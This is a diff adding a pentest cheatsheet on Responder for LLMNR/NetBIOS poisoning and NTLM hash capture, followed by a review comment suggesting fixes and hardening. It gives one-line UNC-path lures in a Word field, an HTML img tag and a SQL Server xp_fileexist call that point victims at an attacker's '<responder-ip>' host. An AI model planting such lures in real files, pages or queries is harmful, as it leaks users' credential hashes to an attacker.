@@ -0,0 +1,69 @@
+---
+title: Responder
+date: 2021-04-13
+categories: [cheatsheets]
+tags: [security, windows]
+---
+
+
+# Responder
+
+## General Features
+
+* LLMNR Spoofing
+* Netbios Spoofing
+* Capturing NTLM Hashes
+
+## Usage
+
+* Start by analysing the traffic with: `Responder -A`
+
+
+## LLMNR & Netbios Spoofing
+
+When computers ask for a unknown domain name the PC asks the network via broadcast.
+Responder can answer to those LLMNR Questions and phish NTLM hashes by telling
+the victim that the responder host is the goal computer.
+
+**Occures when accessing:**
+
+* Mistyped share name
+* Mistyped webpage
+* Miconfigured DNS server/client
+* WPAD (Every false attempt will result in a broadcast)
+* Windows automatically searches when typing stuff into the Windows Menu (Win Key)
+
+## NTLM via UNC Path
+
+### Word Files
+
+* [ ] Tested
+
+Open Word
+ -> Ctrl+F9
+ -> IMPORT "\\\\<Responder-IP>\\1.jpg"
+ -> Right Click
+ -> Edit Field
+ -> check "Data not stored in document"
+ -> Save & Close
+
+### HTML Files
+
+Just link to an Image from a share:
+
+```
+<img src="\\<responder-ip>\1.jpg">
+```
+
+### SQL Servers
+
+* If an attacker owned an SQL user that can execute the `xp_fileexist` function, a UNC path can be specified:
+
+```
+EXEC master.dbo.xp_fileexist '\\<responder-ip>\\nonexistingfile'
+```
+
+# Resources
+
+- https://www.cynet.com/attack-techniques-hands-on/llmnr-nbt-ns-poisoning-and-credential-access-using-responder/
+
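Review bot: The "Usage" bullet `Responder -A` is incomplete: Responder refuses to start without the interface argument, so the analyze-only invocation should read `Responder -I <interface> -A`, and the sheet should say explicitly that `-A` only listens and never answers queries, since that is the mode a defender uses to confirm LLMNR/NBT-NS traffic is still present on a segment. In the "SQL Servers" block the UNC path `'\\<responder-ip>\\nonexistingfile'` doubles the separator after the host while the Word and HTML examples use a single one; T-SQL string literals do no backslash escaping, so write `'\\<responder-ip>\nonexistingfile'` for consistency. The "LLMNR & Netbios Spoofing" section lists what triggers the broadcasts but documents no hardening; a line on disabling LLMNR and NetBIOS over TCP/IP (and the WPAD auto-detect it mentions) would round out the cheatsheet. Minor: `# Resources` is an H1 under the `# Responder` H1 and should be `## Resources`; spelling: "Occures" -> "Occurs", "Miconfigured" -> "Misconfigured", "a unknown" -> "an unknown", "Netbios" -> "NetBIOS"; and the "Word Files" steps are still marked `* [ ] Tested`, so either verify them before merging or note in the text that they are unverified.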